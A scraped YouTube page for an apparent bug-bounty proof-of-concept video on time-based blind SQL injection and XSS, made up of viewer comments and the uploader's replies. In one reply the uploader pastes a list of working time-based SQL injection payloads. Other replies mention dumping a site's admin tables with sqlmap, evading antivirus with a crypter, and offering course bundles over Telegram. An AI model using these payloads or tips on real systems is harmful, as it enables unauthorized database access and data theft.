Это видео недоступно.
Сожалеем об этом.

This Time Based Blind SQL Injection and XSS worth 5000$ Bounty | Bug bounty poc

Поделиться
HTML-код
  • Опубликовано: 21 фев 2024
  • Disclaimer: This video is for strictly educational and informational purpose only. I own all equipment used for this demonstration. Hacking without permission is illegal so always ensure you have proper authorization before using security tools in any network environment. thanks.

Комментарии • 333

  • @naar181
    @naar181 5 месяцев назад +11

    1st. Enjoying watching your poc. Thanks bro.

    • @lostsecc
      @lostsecc  5 месяцев назад

      my pleasure ❤️😇

  • @vikasnaval3190
    @vikasnaval3190 5 месяцев назад +5

    love you bro, i really liked your poc videos and learned a lot i hope you will never stop to upload this kind of stuff. stay healthy and wealthy forever.

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      thnq for supporting brother 😇❤️ wait for some days next will is going to be lit..

    • @vikasnaval3190
      @vikasnaval3190 5 месяцев назад

      @@lostsecc thanks for reply, I'm so happy, you have inspired me a lot.
      I am learning wapt from few months I cleared concepts about xss,SQL,csrf,ssrf,file inclusion, file uploading, open redirect and from few days ago started to hunt on intrigrity but it's not finding them is not easy as I learned about the bugs. And so got disappointed and depressed but I saw your video idnk I got motivated and feel confident and started to hunt again I also watch other youtubers I didn't get any better one to understand the things except you. Thanks a lot brother 🫂

    • @lostsecc
      @lostsecc  5 месяцев назад +3

      ❤️bro in bug hunting you just need patience and hardwork dont worry if you not get bounty early but your skills does not waste so maybr after some month or year you will got high bounty and there your all time spend on this will be recover so..just focus on learning my reccomendation is to solve portswigger labs that is some high level from bssic to expert after that solve some bwapp & rootme labs that are only for webapp and also watch some medium article there you will got idea and bypass all new techniques and also use twitter there you got many bug hunting stufss & read hackerone reports like if you want to master openredirect or xss read all the hackerone reports there you will get real world example and idea.....if you any premium.courses i will help you jusg msg me in telegram @lostsec msg me through bot i will give you all bundle for webapp that will sure help you ❤️just keep learning keep going this field is different from all so not think that your time waste you learn new new skills stufss daily so just keep going ....❤️🫂

  • @NinjaLives-rg8vl
    @NinjaLives-rg8vl 5 месяцев назад +13

    I really learn alot from ur videos keep on and thank's for the great musics too ♥

    • @NinjaLives-rg8vl
      @NinjaLives-rg8vl 5 месяцев назад

      can i get a good playlist from spotify please ?

    • @lostsecc
      @lostsecc  5 месяцев назад +2

      i mostly found from instagram and youtube bcz algorithm show to me most bcz i like that type of songs..

    • @NinjaLives-rg8vl
      @NinjaLives-rg8vl 5 месяцев назад

      @@lostsecc good luck to you

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      ❤️😇

  • @someyounggamer
    @someyounggamer 2 месяца назад +3

    This is awesome work. I am a beginner but learning more and more as I watch you. Please keep the poc's coming.

    • @lostsecc
      @lostsecc  2 месяца назад

      ywah soon overload in upcomming days...with lots of waf bypass

  • @user-nq2cq5fl4q
    @user-nq2cq5fl4q 5 месяцев назад +11

    Bro you must drop your full playlist. all of them are making me understand what you are doing.
    great videos btw.

    • @lostsecc
      @lostsecc  5 месяцев назад +17

      soon i will upload hunting video from start recon to end

    • @salman321able
      @salman321able 5 месяцев назад +1

      @@lostsecc waiting

    • @aivizyoner
      @aivizyoner 5 месяцев назад

      @@lostsecc waiting

    • @ThaLiquidEdit
      @ThaLiquidEdit 5 месяцев назад

      waiting

    • @DeonLives
      @DeonLives 5 месяцев назад

      Waiting bro

  • @misterleo885
    @misterleo885 5 месяцев назад +18

    When they paid $53 for SQL injection 😢

    • @mreditor
      @mreditor 4 месяца назад +2

      Make more impact retrieve sensitive info lol 😂

    • @hammadzaki7534
      @hammadzaki7534 Месяц назад +2

      😂

  • @d4nm4c
    @d4nm4c 5 месяцев назад

    Wow nice find bro! Loving your videos! Thanks for sharing the knowledge!

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      thnq for supporting brother ❤️😇 its means a lot for me

  • @Ajay_Yadav_Smart
    @Ajay_Yadav_Smart 5 месяцев назад +3

    Literally I'm in love with that boys skills.

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      😇❤️🥰

    • @Ajay_Yadav_Smart
      @Ajay_Yadav_Smart 5 месяцев назад +1

      @@lostsecc Bro, Do you have to earn any bachelor degree in CS or IT before applying in CEH?

    • @lostsecc
      @lostsecc  5 месяцев назад +2

      in bug hunting you dont need anything just your skill and hardwork is enough

    • @Ajay_Yadav_Smart
      @Ajay_Yadav_Smart 5 месяцев назад +1

      @@lostseccBro Do you have any bachelor degree in any stream?.

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      yes

  • @alhusseinalseelawi979
    @alhusseinalseelawi979 19 дней назад

    damn after that one you earned a sub great work

  • @Testing2bug
    @Testing2bug 7 дней назад

    would you mind sharing how you have customized WSL?

    • @lostsecc
      @lostsecc  7 дней назад +1

      install ohmyposh themes

    • @Testing2bug
      @Testing2bug 7 дней назад

      @@lostsecc Thank you brother

  • @TSNINJA20
    @TSNINJA20 5 месяцев назад

    जय श्री राम 🚩🧡 bhai really appreciate your work and your strategies 🙌

    • @lostsecc
      @lostsecc  5 месяцев назад

      thnq so much brother its means a lot for me ❤️😇

  • @guilhermecarvalho9279
    @guilhermecarvalho9279 2 месяца назад

    Awesome bro! That’s amazing! You are using WSL2, right? Have you ever had a problem using it in bug bounty?

    • @lostsecc
      @lostsecc  2 месяца назад

      not single issue till now

  • @hk416ak-47
    @hk416ak-47 5 месяцев назад

    Thanks guy for your video, few people do technical videos

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      Thnq for supporting brother ❤️

  • @Mcm1lan
    @Mcm1lan 5 месяцев назад +1

    Hello can you tell me how you displaying tables in your terminal by manual sql injection? I think you are using sqlmap but i dont know

    • @lostsecc
      @lostsecc  5 месяцев назад

      yes its sqlmap due to privacy and strike i did not show all

    • @Mcm1lan
      @Mcm1lan 5 месяцев назад

      @@lostsecc okay thanks and can you tell me or can you make a video or recommend me one how you doing it? I mean you are using manual sql injection and listing tables in sqlmap

  • @songsxmashup
    @songsxmashup 5 месяцев назад +1

    superb brother !!!!!!! by the way how you added skulls to the wsl linux

    • @lostsecc
      @lostsecc  5 месяцев назад

      download window terminal from microsoft store and goto setting and change..

  • @nonidentified89
    @nonidentified89 5 месяцев назад +2

    Bro you are on fire 🔥 💯

    • @lostsecc
      @lostsecc  5 месяцев назад

      ❤️😇🥰

  • @ReligionAndMaterialismDebunked
    @ReligionAndMaterialismDebunked 4 месяца назад

    Nice. Shalom. :3 Great song. 🤝🤓

  • @AyushKumar-rg1uk
    @AyushKumar-rg1uk 2 месяца назад

    How is this blind xss. In blind xss you send the payload and it gets reflected by the server on some other location so there would be no way to tell if our payload succeeded or not without knowing that location that's why it's called blind xss. What you found was clearly reflected xss can be confirmed by viewing the page source and our payload would be reflected in it.

    • @lostsecc
      @lostsecc  2 месяца назад

      on the same endpoint blind sqli there so i dont show the exploitation part bcz of yt policy..but i show the data dump by sqlmap

    • @tpevers1048
      @tpevers1048 Месяц назад

      Bro do you show it on telegram,m

  • @modawi5
    @modawi5 5 месяцев назад

    great job bro and thanks for sharing, but did you copy the request from burp while using sqlmap or if you don't mind what the sqlmap command that you did look like

    • @lostsecc
      @lostsecc  5 месяцев назад +3

      no i just use some flags in sql

  • @hamakurd
    @hamakurd Месяц назад

    Great video! can you tell me how do you find your targets and websites. Thanks.

    • @lostsecc
      @lostsecc  Месяц назад

      check programs that has mass scopes and domains

  • @FoneHolic
    @FoneHolic 5 месяцев назад

    Bhai dil khush kar diya may tumhari saari poc dekhta hu Phonk song ke saath maza aa jata hay ❤❤ vibe match hoti hay yaar❤❤
    Ek question tha ?
    What are you currently studying or what are you doing!!?
    BTW bahut hi zyada interest hay bug hunting and cybersec me mera name zeltarox yaad rakhna bro!!

    • @lostsecc
      @lostsecc  5 месяцев назад

      are love you bhai ❤️ i am currently security researcher & full time bug hunter

  • @cll00180
    @cll00180 5 месяцев назад

    excellent video :) you should make a video how to deface a website.

  • @MR_HACKER_27
    @MR_HACKER_27 5 месяцев назад

    Nice bro (sqlmap sql injection💪👍)❤❤

  • @techboy707
    @techboy707 5 месяцев назад +1

    bro make a video on how to start in bug hunting to make money and guide a full path

    • @lostsecc
      @lostsecc  5 месяцев назад +2

      i am.going to make series of bug hunting soon

  • @davelewis36
    @davelewis36 5 месяцев назад +1

    Hey I am new in hacking, but seeing your succes I wonder if you could help me find the best way to learn all those skill I will need to make money with this.

    • @lostsecc
      @lostsecc  5 месяцев назад

      yes sure i will make full playlist for that

  • @miki_official7750
    @miki_official7750 5 месяцев назад +1

    How to use cmd in window as terminal in kali

    • @lostsecc
      @lostsecc  5 месяцев назад +2

      use wsl2

  • @0day__
    @0day__ 5 месяцев назад +1

    Can you make a video on how to customise kalilinux like you have

    • @lostsecc
      @lostsecc  5 месяцев назад

      yes sure

    • @user-ij4jn6rb1x
      @user-ij4jn6rb1x 5 месяцев назад

      Please make the video Maybe I will delete kali on the VM, there are many problems I think it will be better on wsl2 in terms of speed?

    • @lostsecc
      @lostsecc  5 месяцев назад

      yes wsl2 is fast and simple to use and no more rams and cpu usage

    • @user-ij4jn6rb1x
      @user-ij4jn6rb1x 5 месяцев назад

      @@lostsecc So please make the video 🌹

    • @lostsecc
      @lostsecc  5 месяцев назад

      sure

  • @jeremied7945
    @jeremied7945 День назад

    Question: Can you report a new bug for each payload ? and so getting multiple bounty?

    • @lostsecc
      @lostsecc  День назад +1

      no

    • @jeremied7945
      @jeremied7945 День назад

      @@lostsecc But how come actually? Because if they resolve the problem for one payload it doesn't mean it's gonna be fixed for all. Meaning if they don't accept your multiple payloads as different bounty then you can wait for them to fix it, and then come back after a few weeks with a different payload actually. And if you tell no because they will register this bug no matter what payload is used, then it would mean that somebody else who finds the same vulnerability but with a different would have no rights to claim it ? But the breach would be still open. I'm puzzled here can you explain to me in details how it works please?

  • @tpevers1048
    @tpevers1048 Месяц назад

    What command you use to extract blind databases? With sql map?

    • @lostsecc
      @lostsecc  Месяц назад

      its timebased comand --technique=T

  • @romanoravec1025
    @romanoravec1025 5 месяцев назад

    Nice video. Where did you get the SQL payload list from? Also, does Selfeey have a public bug bounty program?

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      i get it from google just search time based blind sql and selfeey has no any bounty program

    • @romanoravec1025
      @romanoravec1025 5 месяцев назад

      @@lostsecc What does the 5K$ in the title mean then? :D

    • @lostsecc
      @lostsecc  5 месяцев назад

      it means its worth 5k$ or more then that if you submit this to bounty platform if its bounty program then its around 50k bcz there is so much sensitive tabless and data you can check clearly including payment details otp details documents etc...

    • @romanoravec1025
      @romanoravec1025 5 месяцев назад

      Did you manage to view the records from the DB, or just list the table names?

    • @lostsecc
      @lostsecc  5 месяцев назад

      i dumped admin tables bruhh

  • @SolRojo_
    @SolRojo_ 5 месяцев назад

    Nice video, are you using a virtual machine? Why do you use windows for this type of operation?

    • @lostsecc
      @lostsecc  5 месяцев назад

      its wsl2 kali its lightweight and fast virtual machine consume lots of ram,cpu,storage

  • @ardabruh9086
    @ardabruh9086 5 месяцев назад

    you are just something else dude

    • @lostsecc
      @lostsecc  5 месяцев назад

      ❤️😇

  • @jeneelshah2946
    @jeneelshah2946 5 месяцев назад

    Finally back❤

  • @korea7moda
    @korea7moda 5 месяцев назад +1

    good luck 😊

  • @Treylog
    @Treylog Месяц назад

    where do you get CoffinXP ?

  • @studyrelaxwithme4564
    @studyrelaxwithme4564 2 месяца назад

    Where come from the payloads list that you paste to intruder?
    By the way great video

    • @lostsecc
      @lostsecc  2 месяца назад

      i shared in my telegram

  • @sukremez1870
    @sukremez1870 5 месяцев назад

    are burp suite free version able to do some of your action? or is there alternative (if any free better)

    • @lostsecc
      @lostsecc  5 месяцев назад

      no pro version has more features and also intruder speed is fast in pro version

    • @sukremez1870
      @sukremez1870 5 месяцев назад

      @@lostsecc thanks m8, i really like your content, like i kinda want to make cyber security as my other skills, especially in web/api penetration, hope someday u willing to teach us step by step like how to know which website is vurnerable etc

  • @krivadnaaiservices
    @krivadnaaiservices 5 месяцев назад

    So the payliad will work for search param

  • @moamenyasser6397
    @moamenyasser6397 3 месяца назад

    after exploiting the XSS, how did you dump all the databases? using burp?

    • @lostsecc
      @lostsecc  3 месяца назад

      there is also sqli on that param

    • @moamenyasser6397
      @moamenyasser6397 3 месяца назад

      @@lostsecc yes i got that i mean what tool did you use to dump the databases? sqlmap?

    • @lostsecc
      @lostsecc  3 месяца назад

      sqlmap

  • @milandogtermiantor
    @milandogtermiantor 4 дня назад

    hello please can you tell me, what am i suppose to do when i ask for "bug bounty donation" because all webs just ignore it even when i "help" them and afterwards they fix the issue and vulnerability :( iam sad that i cannot turn some payouts/donations for my skills and educations let me know some tips and tricks bro please

  • @nirdeshraya2006
    @nirdeshraya2006 5 месяцев назад

    how did you report the vulnerability ? i mean where? i have also found few bugs in this platform how do i report the vulnerability

    • @lostsecc
      @lostsecc  5 месяцев назад

      in openbugbounty program & or in company emails extracted by hunter io

  • @harshh25.02
    @harshh25.02 5 месяцев назад +1

    Amazing. Just a request from my side "Can you share the list of all tools and cli tools you use or have installed in your system?"

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      just type same name that shown in terminal you will find all in github

    • @0xbr0d
      @0xbr0d 5 месяцев назад

      the one you found db tables with, that is hidden ​@@lostsecc

  • @ThanhVu-kg7oo
    @ThanhVu-kg7oo 5 месяцев назад

    Bro may i know how did you detect the bugs? Did you use any automation tools or test manually in detection phase?

    • @lostsecc
      @lostsecc  5 месяцев назад

      i do both soon going to upload full bug hunting series..

    • @akshaymaurya9052
      @akshaymaurya9052 5 месяцев назад

      @@lostsecc i am waiting .

    • @ThanhVu-kg7oo
      @ThanhVu-kg7oo 5 месяцев назад

      @@lostsecc thank you. I'm looking forward to watch the series and learn from you

  • @user-pe1og1vs5x
    @user-pe1og1vs5x 3 месяца назад

    what is a payload to use intruder ?

    • @lostsecc
      @lostsecc  3 месяца назад

      i sended in my telegram channel

  • @bugbouty
    @bugbouty 4 месяца назад

    bro you testing sql in burp
    how did you get that tables

    • @lostsecc
      @lostsecc  4 месяца назад

      dm me in telegram

  • @venkateshhero5967
    @venkateshhero5967 5 месяцев назад

    Great man keep going🎉🔥

    • @lostsecc
      @lostsecc  5 месяцев назад

      thnq for supporting brother ❤️

  • @cyberman6021
    @cyberman6021 5 месяцев назад

    There is no WAF so that made easy for you :) congratulate

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      there is also payload for wafbypass if it has waf

    • @cyberman6021
      @cyberman6021 5 месяцев назад

      @@lostsecc
      Do you have contact account ?

  • @AlexModi-zv6kd
    @AlexModi-zv6kd 4 месяца назад +1

    Nice 😅

  • @azm_gaming
    @azm_gaming 5 месяцев назад

    how did you manage to have this type of shell on windows because these are linux commands on windows

    • @lostsecc
      @lostsecc  5 месяцев назад

      bcz its wsl2 with kali installed

  • @_relevant
    @_relevant 5 месяцев назад

    is burp a more advanced version of insomnia?

  • @AsianDrip
    @AsianDrip 4 месяца назад

    Bro you should explain what are you doing as well

  • @firman.maulanaaaa
    @firman.maulanaaaa 5 месяцев назад

    waiting full playlist☝️😂

  • @accountdeleted
    @accountdeleted 4 месяца назад

    Love you content brother 😍

  • @BigMassoudHackerGangester
    @BigMassoudHackerGangester 5 месяцев назад

    you just do it with xsstrike or used other tool in this video ??

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      for xss i used xsstrike only in this video

  • @nihaltikka
    @nihaltikka 5 месяцев назад

    What was the tool you used for database banner grabbing ? Also can you paste the comand here ? Any reason you have hide that command only showing database names

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      its sqlmap if i upload full video i will get community strike so i alraday done this and got strike so thats ehy i dont show full demonstrate..

    • @nihaltikka
      @nihaltikka 5 месяцев назад

      @@lostseccThanks for the response, Great videos. If possible please paste the command you used for sqlmap.

  • @bitattacks4180
    @bitattacks4180 5 месяцев назад

    What does the second tab of the terminal have to do with the attack?

    • @maxrandom569
      @maxrandom569 5 месяцев назад

      It's a list of tables contained in the webserver's database by abusing the SQLi vulnerability via sqlmap.

    • @bitattacks4180
      @bitattacks4180 5 месяцев назад

      @@maxrandom569 But would it have any connection with XSS?

    • @lostsecc
      @lostsecc  5 месяцев назад

      no xss is client side issue

    • @ruttalaabhinav8588
      @ruttalaabhinav8588 5 месяцев назад

      What kind of command you used to dump aok databases

  • @kushgautam2987
    @kushgautam2987 5 месяцев назад +1

    bro i'm a newbie and want to learn bug hunting from where i can start

    • @lostsecc
      @lostsecc  5 месяцев назад

      sure ❤️

    • @lostsecc
      @lostsecc  5 месяцев назад

      just send me message in telegram i will send you premium.course free..

  • @Bhaveshdewasi_1
    @Bhaveshdewasi_1 5 месяцев назад

    may i know, why you use isp and not virtualbox or vmware?

    • @lostsecc
      @lostsecc  5 месяцев назад +2

      i have both but in virtualbox its lagg so wsl2 is fast and easy

  • @lukeastorw
    @lukeastorw 5 месяцев назад

    Hey, which terminal you're using i mean how con you run linux command on windows?? plz explain

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      its wsl2

  • @veerplays5916
    @veerplays5916 5 месяцев назад

    Bro can you suggest any tutorial/book/course for learning hacking and bug bounty.
    If you can drop a course it will be very helpful.

    • @lostsecc
      @lostsecc  5 месяцев назад

      there are many good youtuber learn from then for webhacking i reccomend rana khalil and nahmsec and for lab practice use portswigger labs..best one

  • @RaGhav363
    @RaGhav363 5 месяцев назад

    Can you make one vedio on how to manually obfuscate any payload?

    • @lostsecc
      @lostsecc  5 месяцев назад

      just url encode and double encode in html or url encoding

    • @RaGhav363
      @RaGhav363 5 месяцев назад

      @@lostsecc I need to bypass Microsoft defender and other AVs so . Will it work

    • @lostsecc
      @lostsecc  5 месяцев назад

      no its for xss and other payloads for window you use villian and other tools that will work good..checkout my villian tool video you will find what you are looking for

    • @RaGhav363
      @RaGhav363 5 месяцев назад

      @@lostsecc sure but I want know about how can I manually obfuscate payloads

    • @lostsecc
      @lostsecc  5 месяцев назад

      you need cripter for that

  • @canned2619
    @canned2619 5 месяцев назад

    Do the bounties actually pay out?

  • @itsm3dud39
    @itsm3dud39 5 месяцев назад

    can you make a video of all the tools you use?? can you tell here?

    • @lostsecc
      @lostsecc  5 месяцев назад

      its xsstrike and sqlmap

  • @bugxdtesterr
    @bugxdtesterr 5 месяцев назад

    Hey bro I like your videos! Can you share your timebased sqli detection wordlist ?
    love from Türkiye

    • @lostsecc
      @lostsecc  5 месяцев назад

      yes sure ❤️ dm me on telegram @lostsec

  • @securityempire
    @securityempire 5 месяцев назад

    Their bug bounty program is not running then how did you report it?

    • @lostsecc
      @lostsecc  5 месяцев назад

      i reported to there support mail id

  • @onlineghor
    @onlineghor 4 месяца назад

    Thanks, I get the idea.

  • @Vizkeu
    @Vizkeu 5 месяцев назад

    hi bro i should start for learning comptia security directly without necessarily going with a+ or I will have to start with a+

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      these certification only helpful in jobs for bug hunting you dont need anything just learn webappliction and hunt for bugs... btw comptia+ is good also security +

    • @Vizkeu
      @Vizkeu 5 месяцев назад

      @@lostsecc ok thanks bro i can start network + for good solid base in network and security plus and start bug hunting

    • @Vizkeu
      @Vizkeu 5 месяцев назад

      @@lostsecc you very good person all the time you answee

    • @lostsecc
      @lostsecc  5 месяцев назад

      ❤️😇

  • @oo7posam581
    @oo7posam581 5 месяцев назад

    Where did you find this company, Don't say Private Program!

    • @lostsecc
      @lostsecc  5 месяцев назад

      Random finding..

  • @HackTheMatric
    @HackTheMatric 5 месяцев назад

    Which terminal themes you using in your linux

  • @LostAdmin
    @LostAdmin 5 месяцев назад

    How did you get bold and italic youtube name??

    • @lostsecc
      @lostsecc  5 месяцев назад

      from google

  • @madatch9947
    @madatch9947 5 месяцев назад

    Awesome video. Can you tell me what is that coffinxp? Is that linux on windows? And what linux distro is it?

    • @lostsecc
      @lostsecc  5 месяцев назад

      coffinxp is my name bro 😉 and terminal is wls2 kali in window terminal

  • @gamerz9129
    @gamerz9129 5 месяцев назад

    which VPS are you using? i like your terminal ❤

    • @gamerz9129
      @gamerz9129 5 месяцев назад

      bruth do have any authanticaton bypass poc ?

    • @lostsecc
      @lostsecc  5 месяцев назад

      its wls2 with window terminal

  • @user-tp9uh1gd9q
    @user-tp9uh1gd9q 5 месяцев назад

    What programs and tools do you use?

    • @lostsecc
      @lostsecc  5 месяцев назад

      there are many

  • @mxzyy7032
    @mxzyy7032 5 месяцев назад

    Do you have any advice for someone who wants to learn about bug bounty?

    • @lostsecc
      @lostsecc  5 месяцев назад

      just have a passion in this field and persistence hard work + do practicle after watching videos solve portswigger labs...

    • @mxzyy7032
      @mxzyy7032 5 месяцев назад

      @@lostsecc thank you for the advice, I really appreciate it

  • @user-kt3qh2su6o
    @user-kt3qh2su6o 5 месяцев назад

    Which wordlist are you using?

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      time based blind sql

  • @mrdeatek8945
    @mrdeatek8945 5 месяцев назад

    Hello how can I learn this skill. I love your videos

    • @lostsecc
      @lostsecc  5 месяцев назад

      just need passion in this filed do practicle after watching videos and solve portswigger labs

  • @writecode9932
    @writecode9932 3 месяца назад

    Bro, is it possible to get the copy of ur Sqli payloads?

    • @lostsecc
      @lostsecc  3 месяца назад +1

      i shared in my telegram channel

    • @writecode9932
      @writecode9932 3 месяца назад

      Can u share ur telegram link again plz

  • @techboy707
    @techboy707 5 месяцев назад

    bro how much you make in a month and tell me how much i can make can i do this as a fulll time and make my whole carrier in this

  • @pynimp
    @pynimp 5 месяцев назад

    Daily Driver => windows

  • @ahsan50505
    @ahsan50505 5 месяцев назад

    Brother, this program is running on which platform?

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      its not in bounty platform

  • @soulvideos7834
    @soulvideos7834 5 месяцев назад

    Thanks for this bro , do you got bountu from them?

  • @gowtham8774
    @gowtham8774 5 месяцев назад

    Can you please share time based sql injection all payloads?

    • @lostsecc
      @lostsecc  5 месяцев назад

      SELECT CASE WHEN (1=1) THEN pg_sleep(25) ELSE pg_sleep(0) END--
      'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
      1'=sleep(25)='1
      '%2b(select*from(select(sleep(2)))a)%2b'
      WAITFOR DELAY '0:0:25';--
      OR SLEEP(25)
      AND SLEEP(25) AND ('kleiton'='kleiton
      WAITFOR DELAY '0:0:25' and 'a'='a;--
      IF 1=1 THEN dbms_lock.sleep(25);
      SLEEP(25)
      pg_sleep(25)
      and if(substring(user(),1,1)>=chr(97),SLEEP(25),1)--
      DBMS_LOCK.SLEEP(25);
      AND if not(substring((select @version),25,1) < 52) waitfor delay '0:0:25'--
      1,'0');waitfor delay '0:0:25;--
      (SELECT 1 FROM (SELECT SLEEP(25))A)
      %2b(select*from(select(sleep(25)))a)%2b'
      /**/xor/**/sleep(25)
      or (sleep(25)+1) limit 1 --

  • @hackingchannel495
    @hackingchannel495 5 месяцев назад

    Bro apni video ma apna voice over karo bhi

  • @Rimuruux
    @Rimuruux 5 месяцев назад

    What laptop do you use if you can let me know?

    • @lostsecc
      @lostsecc  5 месяцев назад

      hp

    • @Rimuruux
      @Rimuruux 5 месяцев назад

      is it any specific model like pavilion for example? i'm searching for a laptop for myself so that's why i ask@@lostsecc

    • @lostsecc
      @lostsecc  5 месяцев назад

      asus tuff is best in budget but hp pavillion is my fav bcz i like its look and slim body..

  • @H4cker_Nafeed
    @H4cker_Nafeed 5 месяцев назад

    How to connect you ?

  • @Waleed-Alsayed
    @Waleed-Alsayed 5 месяцев назад

    Bro what is the name of the terminal you have and how to install it u wanab know

    • @lostsecc
      @lostsecc  5 месяцев назад

      window terminal with kali installed with wsl2 with ohmyposh custom theme

  • @Adarsh.-.
    @Adarsh.-. 5 месяцев назад

    What tool did you used to extract database and also i joined your telegram group

    • @lostsecc
      @lostsecc  5 месяцев назад

      there are many tools i will soon upload all

    • @Adarsh.-.
      @Adarsh.-. 5 месяцев назад

      @@lostsecc bro recently I tried a SQL injection on a target and I got 6 seconds of delay and I extracted a table name also but they are saying they can't reproduce attack and want they me extract another table name

    • @lostsecc
      @lostsecc  5 месяцев назад

      dm me.i will.give you command to extract full tabless and data @lostsec

  • @amineboumesbah3831
    @amineboumesbah3831 3 месяца назад

    Cool

  • @alumtech4083
    @alumtech4083 5 месяцев назад

    Hi bro awesome vid, what is the song plying?

    • @lostsecc
      @lostsecc  5 месяцев назад

      its aurora slowed reverb ❤️

    • @alumtech4083
      @alumtech4083 5 месяцев назад

      @@lostsecc awesome, thx brother

  • @termireum
    @termireum 5 месяцев назад

    They don't have bug bounty program, how could you get 5k?

    • @lostsecc
      @lostsecc  5 месяцев назад

      i said its worth 5k.but if its bounty program.its more then that sql injection start with 5k+ to 50000+ $ depend on the target acusition

    • @termireum
      @termireum 5 месяцев назад

      Okay, I think I'm misunderstanding here. lol
      Hey, dude, is it possible for you to add some narrations in your future videos so we can better understand?
      @@lostsecc

  • @REDSPYTECH
    @REDSPYTECH 5 месяцев назад

    Nice work

    • @lostsecc
      @lostsecc  5 месяцев назад

      thnq bro ❤️

  • @mostalki
    @mostalki 5 месяцев назад

    how do u know this , do u studied it or cyber security ?

    • @lostsecc
      @lostsecc  5 месяцев назад

      i am security researcher & bug hunter

  • @megamagnumhyd1072
    @megamagnumhyd1072 5 месяцев назад

    Good video bro.
    How did you customize the terminal?

    • @lostsecc
      @lostsecc  5 месяцев назад +1

      kalilinux in wsl2 with ohmyposh customization

  • @funny_videos31
    @funny_videos31 5 месяцев назад

    bro which terminal you used is it linux terminal

    • @lostsecc
      @lostsecc  5 месяцев назад

      window terminal with wsl2

  • @leo___333
    @leo___333 5 месяцев назад

    Good job bro ❤

    • @lostsecc
      @lostsecc  5 месяцев назад

      thnq bro ❤️😇

  • @OTHMAN-tz2ry
    @OTHMAN-tz2ry 5 месяцев назад

    I need background such as your terminal 🙂💔

    • @lostsecc
      @lostsecc  5 месяцев назад

      install wsl2 kali in window terminal

  • @Serbaserbienamdua
    @Serbaserbienamdua 5 месяцев назад

    $5000 😳🔥🔥🔥

  • @gddiscover7897
    @gddiscover7897 5 месяцев назад

    Bro where you collected this all payload can you share with me 🥺 big fan

    • @lostsecc
      @lostsecc  5 месяцев назад

      search search in google blind sql injection payload list

  • @techboy707
    @techboy707 5 месяцев назад

    how much u are earning in a month by bug hunting and how much you have given time

    • @lostsecc
      @lostsecc  5 месяцев назад

      i am.full time bug hunter 24/7

    • @techboy707
      @techboy707 5 месяцев назад

      how much u make in a month@@lostsecc

    • @techboy707
      @techboy707 5 месяцев назад

      how much you earn in a month and give me a idea how much i can make in this field can i make a carrier and devote my life in bug bounty@@lostsecc

  • @ariadesupriyatna
    @ariadesupriyatna 4 месяца назад

    🎉